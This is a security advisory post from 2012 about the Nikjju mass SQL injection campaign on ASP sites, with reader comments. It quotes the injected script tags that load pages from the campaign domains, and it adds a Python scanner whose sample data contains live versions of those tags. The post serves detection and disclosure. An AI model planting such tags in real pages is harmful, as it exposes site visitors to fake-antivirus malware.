Continued interest in Nikjju mass SQL injection campaign

Published: 2012-04-23
Last Updated: 2012-04-24 00:17:18 UTC
by Russ McRee (Version: 1)
2 comment(s)

Readers continue to write in with updates from sources regarding the Nikjju mass SQL injection campaign. As with the Lilupophilupop campaign from December, ASP/ASP.net sites are targeted and scripts are inserted.

Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php ></script> and the resulting fake/rogue AV campaigns they subject victims to.

Infected site count estimates vary wildly, but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the Lilupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.

As always, if you have logs to share, send them our way via the contact form, or comment with any insight you want to share with readers.

Russ McRee | @holisticinfosec
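
For site owners who want to run that search against their own pages or database exports, here is a small scanner, added as an example and not part of the original diary. It matches script tags by the host of their src rather than by substring, so the spacing variants quoted above are caught and plain-text mentions of the domains are not; the function names and the sample text are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Domains named in the diary entry; extend as further ones are reported.
CAMPAIGN_DOMAINS = {"nikjju.com", "hgbyju.com"}

# <script ... src = URL> with optional quotes and loose whitespace, as in the
# injected tags quoted above. "hxxp" is accepted so defanged reports match too.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*(?P<url>(?:https?|hxxps?)://[^\s\"'<>]+)",
    re.IGNORECASE,
)

def campaign_host(url):
    """Return the campaign domain that url's host belongs to, or None."""
    try:
        host = urlsplit(re.sub(r"^hxxp", "http", url, flags=re.I)).hostname or ""
    except ValueError:  # malformed URL, e.g. unbalanced IPv6 brackets
        return None
    host = host.rstrip(".").lower()
    for domain in CAMPAIGN_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None

def find_injected_scripts(text):
    """Return (line_number, domain, url) for each script tag loading from a campaign domain."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):  # whole-text scan also catches tags split across lines
        domain = campaign_host(m.group("url"))
        if domain:
            lineno = text.count("\n", 0, m.start()) + 1
            hits.append((lineno, domain, m.group("url")))
    return hits

# Constructed sample: page content as it might look after injection into text columns.
SAMPLE = """<h1>Products</h1>
<td>Blue widget</title><script src=http://nikjju.com/r.php></script></td>
<td>Red widget<SCRIPT SRC = "http://hgbyju.com/r.php"></SCRIPT></td>
<script src="https://cdn.example.org/nikjju.com/r.php"></script>
<p>Article mentioning nikjju.com in plain text</p>"""

if __name__ == "__main__":
    for lineno, domain, url in find_injected_scripts(SAMPLE):
        print(f"line {lineno}: {domain} <- {url}")
```

Lines 4 and 5 of the sample are deliberately not reported: one only carries the domain in a URL path on another host, the other only mentions it in text.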

 

 


Comments

Has anyone posted the initial SQL Injection attack payload?

@ Ryan ... 'along those lines:
- http://google.com/safebrowsing/diagnostic?site=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/safebrowsing/diagnostic?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."
.
